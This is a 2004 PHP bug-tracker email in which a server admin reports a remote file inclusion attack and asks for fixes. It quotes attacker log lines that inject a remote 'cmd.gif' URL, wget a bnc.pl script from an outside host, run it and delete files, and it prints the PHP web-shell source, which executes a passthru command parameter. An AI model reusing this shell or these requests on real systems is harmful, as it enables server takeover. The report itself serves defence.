#30236 [NEW]: File Injection (Gif, Jpg, txt)

wschow at comp dot hkbu dot edu dot hk Sat, 25 Sep 2004 17:03:29 -0700

From:             wschow at comp dot hkbu dot edu dot hk
Operating system: Solaris 2.6
PHP version:      5.0.1
PHP Bug Type:     *General Issues
Bug description:  File Injection (Gif, Jpg, txt)


Description:
------------
It seems that PHP 5.0.2 has file injection problem as such:

200.164.94.78 - - [25/Sep/2004:08:29:37 +0800] "GET
/~ABC/test/index1.php?page
=http://h4ck3rscan.port5.com/cmd.gif?&cmd=cd%20tmp/rm%20-rf%20bnc.pl;rm%20-rf%20
bnc.pid HTTP/1.1" 200 6714
200.165.82.160 - - [25/Sep/2004:23:02:24 +0800] "GET
/~ABC/test/index1.php?pag
e=http://h4ck3rscan.port5.com/cmd.gif?&cmd=cd%20/tmp;wget%20members.lycos.co.uk/
spakk/bnc.pl HTTP/1.1" 200 7139
200.165.82.160 - - [25/Sep/2004:23:04:35 +0800] "GET
/~ABC/test/index1.php?pag
e=http://h4ck3rscan.port5.com/cmd.gif?&cmd=cd%20/tmp;perl%20bnc.pl%20-p%201718%2
0-s%20cfcfclols HTTP/1.1" 200 6714

In http://h4ck3rscan.port5.com/cmd.gif, it shows the source:
<?
  // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
  if (isset($chdir)) @chdir($chdir);
  ob_start();
   passthru("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm
/tmp/cmdtemp");
  $output = ob_get_contents();
  ob_end_clean();
  if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<",
"&lt;", $output));
?>

Any solutions?




-- 
Edit bug report at http://bugs.php.net/?id=30236&edit=1
-- 
Try a CVS snapshot (php4):   http://bugs.php.net/fix.php?id=30236&r=trysnapshot4
Try a CVS snapshot (php5.0): http://bugs.php.net/fix.php?id=30236&r=trysnapshot50
Try a CVS snapshot (php5.1): http://bugs.php.net/fix.php?id=30236&r=trysnapshot51
Fixed in CVS:                http://bugs.php.net/fix.php?id=30236&r=fixedcvs
Fixed in release:            http://bugs.php.net/fix.php?id=30236&r=alreadyfixed
Need backtrace:              http://bugs.php.net/fix.php?id=30236&r=needtrace
Need Reproduce Script:       http://bugs.php.net/fix.php?id=30236&r=needscript
Try newer version:           http://bugs.php.net/fix.php?id=30236&r=oldversion
Not developer issue:         http://bugs.php.net/fix.php?id=30236&r=support
Expected behavior:           http://bugs.php.net/fix.php?id=30236&r=notwrong
Not enough info:             http://bugs.php.net/fix.php?id=30236&r=notenoughinfo
Submitted twice:             http://bugs.php.net/fix.php?id=30236&r=submittedtwice
register_globals:            http://bugs.php.net/fix.php?id=30236&r=globals
PHP 3 support discontinued:  http://bugs.php.net/fix.php?id=30236&r=php3
Daylight Savings:            http://bugs.php.net/fix.php?id=30236&r=dst
IIS Stability:               http://bugs.php.net/fix.php?id=30236&r=isapi
Install GNU Sed:             http://bugs.php.net/fix.php?id=30236&r=gnused
Floating point limitations:  http://bugs.php.net/fix.php?id=30236&r=float
MySQL Configuration Error:   http://bugs.php.net/fix.php?id=30236&r=mysqlcfg

#30236 [NEW]: File Injection (Gif, Jpg, txt)

Reply via email to